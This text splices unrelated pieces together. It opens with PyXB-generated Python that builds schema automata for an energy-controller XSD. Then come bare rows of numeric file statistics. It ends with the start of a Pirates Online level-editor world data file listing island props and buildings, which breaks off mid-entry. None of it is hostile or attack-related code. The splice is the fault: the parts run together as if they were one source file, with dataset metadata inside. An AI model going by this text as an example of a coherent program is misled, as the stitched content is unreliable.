        state._set_transitionSet([fac.Transition(successor, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, set(), False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_35.
CTD_ANON_35._Automaton = _BuildAutomaton_77()
# Register CTD_ANON_36's 'usageForecast' child element (typed CTD_ANON_11).
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageForecast'), CTD_ANON_11, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 769, 6)))
def _BuildAutomaton_78 ():
    """Construct the content-model automaton for CTD_ANON_36.

    The model is a strict sequence: header, flexibilityUpdateId,
    validFrom, usageForecast.  Only the final element's state may
    terminate a match.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_78
    del _BuildAutomaton_78
    import pyxb.utils.fac as fac
    schema_path = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (tag, xsd line, xsd column) in the order the schema requires.
    required_order = [
        ('header', 24, 3),
        ('flexibilityUpdateId', 57, 5),
        ('validFrom', 58, 5),
        ('usageForecast', 769, 6),
    ]
    states = []
    end_index = len(required_order) - 1
    for pos, (tag, line, column) in enumerate(required_order):
        use = pyxb.binding.content.ElementUse(
            CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(schema_path, line, column))
        # Terminal state gets an empty final-update set; others get None.
        states.append(fac.State(use,
                                is_initial=(pos == 0),
                                final_update=(set() if pos == end_index else None),
                                is_unordered_catenation=False))
    # Each state transitions only to the next element in the sequence.
    for state, successor in zip(states, states[1:]):
        state._set_transitionSet([fac.Transition(successor, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, set(), False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_36.
CTD_ANON_36._Automaton = _BuildAutomaton_78()
# Register CTD_ANON_37's child elements, generated from the XSD element declarations.
CTD_ANON_37._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), AdjustableRunningModes, scope=CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 883, 6)))
CTD_ANON_37._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timers'), Timers, scope=CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6)))
CTD_ANON_37._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitions'), Transitions, scope=CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 885, 6)))
def _BuildAutomaton_79 ():
    """Build the FAC automaton for CTD_ANON_37's content model.

    Sequence: header, flexibilityUpdateId, validFrom, runningModes, an
    optional 'timers' (occurrence tracked by counter cc_0), ending with
    'transitions'.  PyXB-generated; do not edit by hand.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_79
    del _BuildAutomaton_79
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 bounds the optional element declared at xsd line 884 (min 0, max 1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6))
    counters.add(cc_0)
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModes')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 883, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timers')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # Only the last state may terminate a match (non-None final-update set).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transitions')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 885, 6))
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    # From runningModes: either consume the optional timers (st_4)
    # or skip straight to transitions (st_5).
    transitions.append(fac.Transition(st_4, [
        ]))
    transitions.append(fac.Transition(st_5, [
        ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    st_5._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_37.
CTD_ANON_37._Automaton = _BuildAutomaton_79()
# Register CTD_ANON_38's child elements, generated from the XSD element declarations.
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currentRunningModeId'), pyxb.binding.datatypes.int, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 901, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON_2, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 902, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), pyxb.binding.datatypes.int, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 910, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 911, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), TimerUpdates, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 912, 6)))
def _BuildAutomaton_80 ():
    """Build the finite-automaton content model for CTD_ANON_38.

    The sequence is: header, flexibilityUpdateId, validFrom,
    currentRunningModeId (all required), then three optional elements
    (runningModeFactor, previousRunningModeId, transitionTimestamp, each
    guarded by a 0..1 counter) and a required trailing timerUpdates,
    which is the only accepting state.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_80
    del _BuildAutomaton_80
    import pyxb.utils.fac as fac

    _xsd = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'

    def _loc (line, col):
        # Shorthand for a source location in the generating schema file.
        return pyxb.utils.utility.Location(_xsd, line, col)

    # One 0..1 occurrence counter per optional element.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=_loc(902, 6))
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=_loc(910, 6))
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=_loc(911, 6))
    counters = set()
    counters.update((cc_0, cc_1, cc_2))

    # (element tag, (line, col) in the XSD, is_initial, final_update) per state.
    _state_specs = (
        ('header', (24, 3), True, None),
        ('flexibilityUpdateId', (57, 5), False, None),
        ('validFrom', (58, 5), False, None),
        ('currentRunningModeId', (901, 6), False, None),
        ('runningModeFactor', (902, 6), False, None),
        ('previousRunningModeId', (910, 6), False, None),
        ('transitionTimestamp', (911, 6), False, None),
        ('timerUpdates', (912, 6), False, set()),
    )
    states = []
    for tag, (line, col), initial, fin in _state_specs:
        symbol = pyxb.binding.content.ElementUse(
            CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            _loc(line, col))
        states.append(fac.State(symbol, is_initial=initial,
                                final_update=fin,
                                is_unordered_catenation=False))

    # Edge table: source index -> [(destination index, counter update), ...]
    # where the update is None (no instruction) or a (counter, increment) pair.
    _edges = {
        0: ((1, None),),
        1: ((2, None),),
        2: ((3, None),),
        3: ((4, None), (5, None), (6, None), (7, None)),
        4: ((4, (cc_0, True)), (5, (cc_0, False)),
            (6, (cc_0, False)), (7, (cc_0, False))),
        5: ((5, (cc_1, True)), (6, (cc_1, False)), (7, (cc_1, False))),
        6: ((6, (cc_2, True)), (7, (cc_2, False))),
        7: (),
    }
    for src, edges in _edges.items():
        transitions = []
        for dst, update in edges:
            if update is None:
                instructions = []
            else:
                instructions = [fac.UpdateInstruction(update[0], update[1])]
            transitions.append(fac.Transition(states[dst], instructions))
        states[src]._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Install the content-model automaton on CTD_ANON_38; the builder removes
# itself from the module namespace when invoked, so this runs exactly once.
CTD_ANON_38._Automaton = _BuildAutomaton_80()
| 60.031317
| 414
| 0.775798
| 55,450
| 502,222
| 6.797151
| 0.019946
| 0.028689
| 0.037018
| 0.055335
| 0.874705
| 0.862272
| 0.832699
| 0.826302
| 0.795236
| 0.784435
| 0
| 0.021829
| 0.111192
| 502,222
| 8,365
| 415
| 60.038494
| 0.822525
| 0.131758
| 0
| 0.663902
| 1
| 0
| 0.200804
| 0.171155
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014342
| false
| 0
| 0.015725
| 0
| 0.256437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c6499f819501950939bd7e70ddf612cbf8b95613
| 189,635
|
py
|
Python
|
pirates/leveleditor/worldData/GABES_ravensCoveIsland.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/GABES_ravensCoveIsland.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/GABES_ravensCoveIsland.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Adj Table': {'1271349069.91akelts': [],'1271349163.04akelts': [],'1271349193.8akelts': [],'1271349238.13akelts': [],'1271349357.21akelts': [],'1271349715.76akelts': [],'1271349813.4akelts': ['1271349871.68akelts'],'1271349871.68akelts': ['1271349813.4akelts', '1271349883.93akelts', '1271349925.8akelts'],'1271349883.93akelts': ['1271349871.68akelts'],'1271349925.8akelts': ['1271349871.68akelts', '1271349357.21akelts', '1271349968.82akelts'],'1271349968.82akelts': ['1271349925.8akelts']},'Objects': {'1271348547.01akelts': {'Type': 'Island','Name': 'default','File': '','Environment': 'OpenSky','Minimap': False,'Objects': {'1271350320.82akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'GridPos': Point3(442.667, -255.554, 2.999),'Holiday': '','Hpr': VBase3(64.234, 0.0, 0.0),'Pos': Point3(462.672, -203.981, 7.729),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}},'1271353150.08akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(88.894, 0.0, 0.0),'Objects': {},'Pos': Point3(398.717, -290.775, 168.561),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.76, 0.856, 1.0, 1.0),'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}},'1271353336.94akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271353336.94akelts0','Holiday': '','Hpr': VBase3(-126.854, 8.437, 3.826),'Objects': {'1271353336.96akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-0.179, -3.997, 4.89),'Scale': VBase3(1.0, 1.0, 1.0),'TargetUIDs': []}},'Pos': Point3(-230.347, 417.644, 49.202),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseH_destroyed','SignFrame': '','SignImage': 
'models/buildings/sign1_eng_a_icon_barber'}},'1271353423.55akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271353423.55akelts0','Holiday': '','Hpr': VBase3(-0.537, 0.393, 1.779),'Objects': {'1271353423.62akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-0.819, -13.822, 1.347),'Scale': VBase3(1.0, 1.0, 1.0)},'1271975061.45akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(6.788, 21.065, 0.984),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-365.733, 225.844, 62.643),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseA_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1271353470.51akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271353470.51akelts0','Holiday': '','Hpr': VBase3(-130.621, 1.379, 0.0),'Objects': {'1271353470.54akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(12.899, -22.494, 0.283),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-80.636, -225.232, 109.702),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_spn_jail_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1271976903.32akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271976903.32akelts0','Holiday': '','Hpr': VBase3(-119.5, 0.0, 0.0),'Objects': {'1271976903.34akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.254, -5.504, 0.984),'Scale': VBase3(1.0, 1.0, 
1.0)},'1273091457.33akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(6.788, 21.065, 0.984),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-165.338, -270.256, 113.524),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseC_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273015161.27akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-138.076, -43.77, 19.845),'Pos': Point3(744.648, -260.08, 56.886),'RenderEffect': False,'Scale': VBase3(1.938, 1.938, 1.938),'VisSize': '','Visual': {'Color': (0.572, 0.677, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273016489.02akelts': {'Type': 'Pier','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {},'Pos': Point3(274.191, 371.544, 22.191),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/islands/pier_platform'}},'1273017013.14akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273017013.14akelts0','Holiday': '','Hpr': VBase3(22.772, 0.0, 0.0),'Objects': {'1273091460.78akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.044, -4.421, 5.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-305.943, -139.324, 106.885),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseI_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273017082.44akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273017082.44akelts0','Holiday': '','Hpr': VBase3(157.852, 4.816, 0.0),'Objects': {'1273017082.47akelts': {'Type': 'Door Locator Node','Name': 
'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.424, -5.194, 1.006),'Scale': VBase3(1.0, 1.0, 1.0)},'1273017082.48akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(6.661, 20.924, 1.096),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-316.742, -273.437, 120.268),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseB_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273017199.25akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273017199.25akelts0','Holiday': '','Hpr': VBase3(54.527, 0.0, 0.0),'Objects': {'1273091459.09akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.161, -4.423, 16.535),'Scale': VBase3(1.0, 1.0, 1.0)},'1273619290.28akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-825.368, 156.938, 43.081),'Holiday': '','Hpr': VBase3(-178.343, 0.0, 0.0),'Pos': Point3(13.657, 12.72, 3.455),'Scale': VBase3(1.518, 1.518, 1.358),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}}},'Pos': Point3(-822.934, 138.434, 42.071),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/shanty_npc_house_combo_E','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273017453.02akelts': {'Type': 'Bridge','DisableCollision': False,'Holiday': '','Hpr': VBase3(-84.899, 14.033, -0.018),'Objects': {'1273017340.64akelts': {'Type': 'Bridge','DisableCollision': False,'GridPos': Point3(-735.901, 143.663, 48.606),'Holiday': '','Hpr': VBase3(0.0, -15.794, 0.0),'Pos': Point3(0.0, -44.23, 0.148),'Scale': VBase3(1.0, 1.014, 
0.986),'VisSize': '','Visual': {'Model': 'models/props/shanty_rope_bridge'}}},'Pos': Point3(-681.829, 148.489, 56.807),'Scale': VBase3(0.523, 1.273, 1.0),'VisSize': '','Visual': {'Model': 'models/props/shanty_rope_bridge'}},'1273072887.39akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(105.982, 0.0, 0.0),'Objects': {'1273072952.05akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(261.489, 592.315, 43.38),'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(5.448, -6.714, 18.47),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_wheel'}}},'Pos': Point3(232.086, 584.296, 24.91),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_conveyor_tower'}},'1273072923.48akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(27.307, -3.78, 1.949),'Pos': Point3(249.812, 584.9, 25.276),'Scale': VBase3(0.657, 0.657, 0.657),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_supportBeam_pile'}},'1273073067.58akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273073067.58akelts0','Holiday': '','Hpr': VBase3(-170.301, 5.411, 4.047),'Objects': {'1273091461.7akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.162, -4.354, 0.599),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-296.862, 389.079, 49.049),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseG_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273073190.25akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273073190.25akelts0','Holiday': '','Hpr': VBase3(123.404, 0.0, 0.0),'Objects': {'1273073190.27akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-437.274, 15.618, 
73.009),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-8.035, -1.826, 0.068),'Scale': VBase3(1.0, 1.0, 1.0)},'1273073190.28akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','GridPos': Point3(-420.817, 15.574, 73.097),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(8.421, -1.87, 0.156),'Scale': VBase3(1.0, 1.0, 1.0)},'1273073249.37akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273073249.37akelts0','GridPos': Point3(-464.632, 41.816, 71.332),'Holiday': '','Hpr': VBase3(-1.105, 0.0, -3.426),'Pos': Point3(17.765, -1.023, -1.021),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/spanish_npc_attach_halfporchR','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}}},'Pos': Point3(-455.706, 26.422, 72.353),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_spn_houseA_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273074334.16akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(44.362, 0.872, -0.174),'Pos': Point3(-403.417, 12.617, 72.626),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273074421.59akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273074421.59akelts0','GridPos': Point3(-468.132, 20.639, 71.921),'Holiday': '','Hpr': VBase3(-57.52, 0.0, 0.0),'Pos': Point3(-456.576, 4.309, 72.405),'Scale': VBase3(1.0, 1.0, 0.898),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/spanish_npc_attach_fullarchR','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273091585.2akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(108.943, 1190.323, 4.009),'Scale': 
VBase3(4.28, 4.28, 4.28),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091830.78akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-51.561, 0.0, 0.0),'Pos': Point3(887.329, 788.136, 4.008),'Scale': VBase3(3.476, 3.476, 1.791),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091831.92akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-658.41, 619.207, 4.01),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091832.89akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(4.977, 0.0, 0.0),'Pos': Point3(456.202, 835.02, 4.009),'Scale': VBase3(2.811, 2.811, 2.811),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091845.5akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-657.826, 450.861, 4.009),'Scale': VBase3(3.987, 3.987, 3.987),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_e'}},'1273091851.12akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-65.801, 0.0, 0.0),'Pos': Point3(885.27, -126.372, 4.009),'Scale': VBase3(2.199, 2.199, 2.199),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273091865.31akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(4.794, 0.0, 0.0),'Pos': Point3(-596.681, 800.442, 4.005),'Scale': VBase3(3.494, 3.494, 3.494),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273091868.48akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-843.534, 649.14, 4.009),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_e'}},'1273091870.05akelts': {'Type': 
'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-994.83, 357.834, 4.009),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_e'}},'1273091872.62akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(612.132, 792.482, 4.01),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091875.31akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(73.975, 0.0, 0.0),'Pos': Point3(-901.321, 283.482, 4.007),'Scale': VBase3(2.269, 2.269, 2.269),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091877.31akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-103.803, 0.0, 0.0),'Pos': Point3(-469.619, 690.662, 4.01),'Scale': VBase3(2.459, 2.459, 2.459),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091882.56akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(13.514, 0.0, 0.0),'Pos': 